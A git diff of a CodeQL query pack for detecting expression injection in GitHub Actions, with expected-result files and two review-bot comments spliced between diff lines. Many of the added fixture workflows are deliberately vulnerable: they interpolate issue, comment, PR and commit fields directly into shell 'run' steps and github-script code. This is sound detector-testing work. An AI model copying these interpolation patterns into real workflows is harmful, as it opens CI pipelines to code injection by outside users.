-/**
- * @name Expression injection in Actions
- * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious
- * user to inject code into the GitHub action.
- * @kind path-problem
- * @problem.severity warning
- * @security-severity 9.3
- * @precision high
- * @id actions/command-injection
- * @tags actions
- * security
- * external/cwe/cwe-094
- */
-
-import actions
-import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
-
-private class ExpressionInjectionSink extends DataFlow::Node {
- ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) }
-}
-
-private module MyConfig implements DataFlow::ConfigSig {
- predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
-
- predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
-}
-
-module MyFlow = TaintTracking::Global;
-
-import MyFlow::PathGraph
-
-from MyFlow::PathNode source, MyFlow::PathNode sink
-where MyFlow::flowPath(source, sink)
-select sink.getNode(), source, sink,
- "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() +
- " }}, which may be controlled by an external user."
diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml
new file mode 100644
index 000000000000..8494dea432f7
--- /dev/null
+++ b/ql/test/codeql-pack.lock.yml
@@ -0,0 +1,16 @@
+---
+lockVersion: 1.0.0
+dependencies:
+ codeql/controlflow:
+ version: 0.1.8
+ codeql/dataflow:
+ version: 0.1.8
+ codeql/ssa:
+ version: 0.2.8
+ codeql/typetracking:
+ version: 0.2.8
+ codeql/util:
+ version: 0.2.8
+ codeql/yaml:
+ version: 0.2.9
+compiled: false
diff --git a/ql/lib/test/.github/workflows/test.yml b/ql/test/library-tests/.github/workflows/test.yml
similarity index 100%
rename from ql/lib/test/.github/workflows/test.yml
rename to ql/test/library-tests/.github/workflows/test.yml
diff --git a/ql/lib/test/test.expected b/ql/test/library-tests/test.expected
similarity index 100%
rename from ql/lib/test/test.expected
rename to ql/test/library-tests/test.expected
diff --git a/ql/lib/test/test.ql b/ql/test/library-tests/test.ql
similarity index 100%
rename from ql/lib/test/test.ql
rename to ql/test/library-tests/test.ql
diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml
new file mode 100644
index 000000000000..d85fc698394d
--- /dev/null
+++ b/ql/test/qlpack.yml
@@ -0,0 +1,12 @@
+---
+name: githubsecuritylab/actions-tests
+groups:
+ - actions
+ - test
+dependencies:
+ githubsecuritylab/actions-all: ${workspace}
+ githubsecuritylab/actions-queries: ${workspace}
+extractor: yaml
+tests: .
+warnOnImplicitThis: true
+
diff --git a/ql/src/test/.github/workflows/calling_composite.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml
similarity index 99%
rename from ql/src/test/.github/workflows/calling_composite.yml
rename to ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml
index 79c2d072ef56..cc3f3c2863cb 100644
--- a/ql/src/test/.github/workflows/calling_composite.yml
+++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml
@@ -12,3 +12,4 @@ jobs:
 who-to-greet: ${{ github.event.pull_request.head.ref }}
 - run: echo ${{ steps.foo.outputs.reflected}}
 - run: echo ${{ steps.foo.outputs.tainted}}
+
diff --git a/ql/src/test/.github/workflows/calling_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml
similarity index 99%
rename from ql/src/test/.github/workflows/calling_workflow.yml
rename to ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml
index 7c2bfdf0348f..239ea7ab3878 100644
--- a/ql/src/test/.github/workflows/calling_workflow.yml
+++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml
@@ -44,3 +44,4 @@ jobs:
 needs: call4
 steps:
 - run: echo ${{ needs.call4.outputs.workflow-output }}
+
diff --git a/ql/src/test/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml
similarity index 99%
rename from ql/src/test/.github/workflows/reusable_workflow.yml
rename to ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml
index 45c177edecb6..0ca7ecdfbde3 100644
--- a/ql/src/test/.github/workflows/reusable_workflow.yml
+++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml
@@ -31,3 +31,4 @@ jobs:
 - name: Get changed files
 id: step2
 uses: tj-actions/changed-files@v40
+
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
new file mode 100644
index 000000000000..d31268b12b59
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
@@ -0,0 +1,15 @@
+edges
+| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} |
+| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." |
+| action1/action.yml:24:7:31:4 | name: Remove foo [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} |
+| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | name: Remove foo [value] |
+nodes
+| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet |
+| action1/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] |
+| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} |
+| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} |
+| action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." |
+subpaths
+#select
+| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | Sink |
+| action1/action.yml:35:12:35:51 | echo "H ... et }}." | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | Sink |
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref
new file mode 100644
index 000000000000..f8e1bfca630d
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref
@@ -0,0 +1 @@
+Security/CWE-020/CompositeActionsSinks.ql
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected
new file mode 100644
index 000000000000..23369932e819
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected
@@ -0,0 +1,12 @@
+edges
+| action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} |
+| action1/action.yml:44:7:48:70 | id: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} |
+| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | id: source [tainted] |
+nodes
+| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} |
+| action1/action.yml:42:7:44:4 | id: changed-files | semmle.label | id: changed-files |
+| action1/action.yml:44:7:48:70 | id: source [tainted] | semmle.label | id: source [tainted] |
+| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
+subpaths
+#select
+| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source |
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref
new file mode 100644
index 000000000000..dce31c319238
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref
@@ -0,0 +1,2 @@
+Security/CWE-020/CompositeActionsSources.ql
+
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected
new file mode 100644
index 000000000000..8ec7f44dba3d
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected
@@ -0,0 +1,12 @@
+edges
+| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} |
+| action1/action.yml:37:7:42:4 | id: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} |
+| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | id: reflector [reflected] |
+nodes
+| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet |
+| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} |
+| action1/action.yml:37:7:42:4 | id: reflector [reflected] | semmle.label | id: reflector [reflected] |
+| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} |
+subpaths
+#select
+| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | Summary |
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref
new file mode 100644
index 000000000000..007941cd2f5b
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref
@@ -0,0 +1,2 @@
+Security/CWE-020/CompositeActionsSummaries.ql
+
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected
new file mode 100644
index 000000000000..c9e26d368df7
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected
@@ -0,0 +1,8 @@
+edges
+| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| |
+nodes
+| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path |
+| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| |
+subpaths
+#select
+| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Sink |
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref
new file mode 100644
index 000000000000..369befbce628
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref
@@ -0,0 +1,2 @@
+Security/CWE-020/ReusableWorkflowsSinks.ql
+
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected
new file mode 100644
index 000000000000..8e19cd469ab9
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected
@@ -0,0 +1,12 @@
+edges
+| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} |
+| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] |
+| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} |
+nodes
+| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} |
+| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] |
+| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} |
+| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files |
+subpaths
+#select
+| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source |
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref
new file mode 100644
index 000000000000..cbea721ee343
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref
@@ -0,0 +1,2 @@
+Security/CWE-020/ReusableWorkflowsSources.ql
+
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected
new file mode 100644
index 000000000000..f7d715c9fa1a
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected
@@ -0,0 +1,16 @@
+edges
+| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} |
+| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} |
+| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] |
+| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} |
+| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] |
+nodes
+| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path |
+| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} |
+| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] |
+| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} |
+| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] |
+| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} |
+subpaths
+#select
+| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | Summary |
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref
new file mode 100644
index 000000000000..ff87d53c3d69
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref
@@ -0,0 +1,2 @@
+Security/CWE-020/ReusableWorkflowsSummaries.ql
+
diff --git a/ql/src/test/composite-actions/action.yml b/ql/test/query-tests/Security/CWE-020/action1/action.yml
similarity index 99%
rename from ql/src/test/composite-actions/action.yml
rename to ql/test/query-tests/Security/CWE-020/action1/action.yml
index c43d5fd66946..787fb9f588be 100644
--- a/ql/src/test/composite-actions/action.yml
+++ b/ql/test/query-tests/Security/CWE-020/action1/action.yml
@@ -48,3 +48,4 @@ runs:
 TAINTED: ${{ steps.changed-files.outputs.all_changed_files }}
+
diff --git a/ql/src/test/.github/workflows/argus_case_study.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml
similarity index 100%
rename from ql/src/test/.github/workflows/argus_case_study.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml
diff --git a/ql/src/test/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml
similarity index 100%
rename from ql/src/test/.github/workflows/changed-files.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml
new file mode 100644
index 000000000000..17ead9fdd204
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml
@@ -0,0 +1,28 @@
+on: issue_comment
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo '${{ github.event.comment.body }}'
+
+ echo-chamber2:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.comment.body }}'
+ - run: echo '${{ github.event.issue.body }}'
+ - run: echo '${{ github.event.issue.title }}'
+
+ echo-chamber3:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/github-script@v3
+ with:
+ script: console.log('${{ github.event.comment.body }}')
+ - uses: actions/github-script@v3
+ with:
+ script: console.log('${{ github.event.issue.body }}')
+ - uses: actions/github-script@v3
+ with:
+ script: console.log('${{ github.event.issue.title }}')
\ No newline at end of file
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml
new file mode 100644
index 000000000000..0a64e47f6cba
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml
@@ -0,0 +1,10 @@
+on: issue_comment
+
+# same as comment_issue but this file ends with a line break
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo '${{ github.event.comment.body }}'
diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml
similarity index 100%
rename from ql/src/test/.github/workflows/cross1.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml
diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml
similarity index 100%
rename from ql/src/test/.github/workflows/cross2.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml
diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml
similarity index 100%
rename from ql/src/test/.github/workflows/cross3.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml
new file mode 100644
index 000000000000..fdb140ec3802
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml
@@ -0,0 +1,8 @@
+on: discussion
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.discussion.title }}'
+ - run: echo '${{ github.event.discussion.body }}'
\ No newline at end of file
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml
new file mode 100644
index 000000000000..649d3a6e1319
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml
@@ -0,0 +1,9 @@
+on: discussion_comment
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.discussion.title }}'
+ - run: echo '${{ github.event.discussion.body }}'
+ - run: echo '${{ github.event.comment.body }}'
\ No newline at end of file
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml
new file mode 100644
index 000000000000..a952c8c1ab85
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml
@@ -0,0 +1,11 @@
+on: gollum
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.pages[1].title }}'
+ - run: echo '${{ github.event.pages[11].title }}'
+ - run: echo '${{ github.event.pages[0].page_name }}'
+ - run: echo '${{ github.event.pages[2222].page_name }}'
+ - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe
\ No newline at end of file
diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml
similarity index 100%
rename from ql/src/test/.github/workflows/image_link_generator.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml
diff --git a/ql/src/test/.github/workflows/inter-job.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml
similarity index 100%
rename from ql/src/test/.github/workflows/inter-job.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
new file mode 100644
index 000000000000..5e767ce0239f
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
@@ -0,0 +1,20 @@
+on: issues
+
+env:
+ global_env: ${{ github.event.issue.title }}
+ test: test
+
+jobs:
+ echo-chamber:
+ env:
+ job_env: ${{ github.event.issue.title }}
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.issue.title }}'
+ - run: echo '${{ github.event.issue.body }}'
+ - run: echo '${{ env.global_env }}'
+ - run: echo '${{ env.test }}'
+ - run: echo '${{ env.job_env }}'
+ - run: echo '${{ env.step_env }}'
+ env:
+ step_env: ${{ github.event.issue.title }}
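Review bot: The `# safe` annotation on the last step of gollum.yml is not justified by the context it sits in: toJSON() performs JSON string escaping only, which leaves a single quote untouched, so the expression is not neutralised for the single-quoted `echo` argument it is interpolated into. The .expected file in this commit does list gollum.yml lines 7-10 and omits line 11, so the query evidently treats toJSON() as not reportable, but that is a modelling decision rather than a property of the shell, and the comment should say which it is, e.g. `# not reported: toJSON() is treated as a sanitizer by the query`. If a genuinely safe negative case is wanted in this fixture, the established pattern is to bind the expression to a step `env:` entry and reference it in the script as a quoted shell variable.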
diff --git a/ql/src/test/.github/workflows/matrix.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml
similarity index 100%
rename from ql/src/test/.github/workflows/matrix.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml
diff --git a/ql/src/test/.github/workflows/no-flow1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml
similarity index 100%
rename from ql/src/test/.github/workflows/no-flow1.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml
diff --git a/ql/src/test/.github/workflows/no-flow2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml
similarity index 100%
rename from ql/src/test/.github/workflows/no-flow2.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
new file mode 100644
index 000000000000..d4ce78856694
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
@@ -0,0 +1,14 @@
+on: pull_request_review
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.pull_request.title }}'
+ - run: echo '${{ github.event.pull_request.body }}'
+ - run: echo '${{ github.event.pull_request.head.label }}'
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
+ - run: echo '${{ github.event.pull_request.head.repo.description }}'
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
+ - run: echo '${{ github.event.pull_request.head.ref }}'
+ - run: echo '${{ github.event.review.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
new file mode 100644
index 000000000000..5d288caad85d
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
@@ -0,0 +1,14 @@
+on: pull_request_review_comment
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.pull_request.title }}'
+ - run: echo '${{ github.event.pull_request.body }}'
+ - run: echo '${{ github.event.pull_request.head.label }}'
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
+ - run: echo '${{ github.event.pull_request.head.repo.description }}'
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
+ - run: echo '${{ github.event.pull_request.head.ref }}'
+ - run: echo '${{ github.event.comment.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
new file mode 100644
index 000000000000..215b32528853
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
@@ -0,0 +1,16 @@
+on: pull_request_target
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.issue.title }}' # not defined
+ - run: echo '${{ github.event.issue.body }}' # not defined
+ - run: echo '${{ github.event.pull_request.title }}'
+ - run: echo '${{ github.event.pull_request.body }}'
+ - run: echo '${{ github.event.pull_request.head.label }}'
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
+ - run: echo '${{ github.event.pull_request.head.repo.description }}'
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
+ - run: echo '${{ github.event.pull_request.head.ref }}'
+ - run: echo '${{ github.head_ref }}'
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
new file mode 100644
index 000000000000..2006a7999daf
--- /dev/null
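Review bot: The `# not defined` comments on lines 7-8 of pull_request_target.yml say the issue fields are absent from this event's payload, yet the nodes section of the .expected file added later in this commit lists `pull_request_target.yml:7:12:7:49` and `:8:12:8:48`, which suggests the query still reports them. If reporting a field that does not exist for the triggering event is the intended conservative behaviour, the fixture should say so rather than read as a documented false positive, e.g. `# not defined for pull_request_target; still expected to be reported (event-insensitive source model)`. If instead the query is meant to be event-aware, these two lines are the test that would catch it and the expectation should be revisited; I cannot confirm which from the visible part of the .expected hunk, which extends past this chunk.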
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
@@ -0,0 +1,16 @@
+on: push
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.commits[11].message }}'
+ - run: echo '${{ github.event.commits[11].author.email }}'
+ - run: echo '${{ github.event.commits[11].author.name }}'
+ - run: echo '${{ github.event.head_commit.message }}'
+ - run: echo '${{ github.event.head_commit.author.email }}'
+ - run: echo '${{ github.event.head_commit.author.name }}'
+ - run: echo '${{ github.event.head_commit.committer.email }}'
+ - run: echo '${{ github.event.head_commit.committer.name }}'
+ - run: echo '${{ github.event.commits[11].committer.email }}'
+ - run: echo '${{ github.event.commits[11].committer.name }}'
\ No newline at end of file
diff --git a/ql/src/test/.github/workflows/simple1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml
similarity index 100%
rename from ql/src/test/.github/workflows/simple1.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml
diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml
similarity index 100%
rename from ql/src/test/.github/workflows/simple2.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml
diff --git a/ql/src/test/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml
similarity index 100%
rename from ql/src/test/.github/workflows/test.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml
new file mode 100644
index 000000000000..60e7645f60fe
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml
@@ -0,0 +1,16 @@
+on:
+ workflow_run:
+ workflows: [test]
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.workflow_run.display_title }}'
+ - run: echo '${{ github.event.workflow_run.head_commit.message }}'
+ - run: echo '${{ github.event.workflow_run.head_commit.author.email }}'
+ - run: echo '${{ github.event.workflow_run.head_commit.author.name }}'
+ - run: echo '${{ github.event.workflow_run.head_commit.committer.email }}'
+ - run: echo '${{ github.event.workflow_run.head_commit.committer.name }}'
+ - run: echo '${{ github.event.workflow_run.head_branch }}'
+ - run: echo '${{ github.event.workflow_run.head_repository.description }}'
diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected
new file mode 100644
index 000000000000..55075b7baf3b
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected
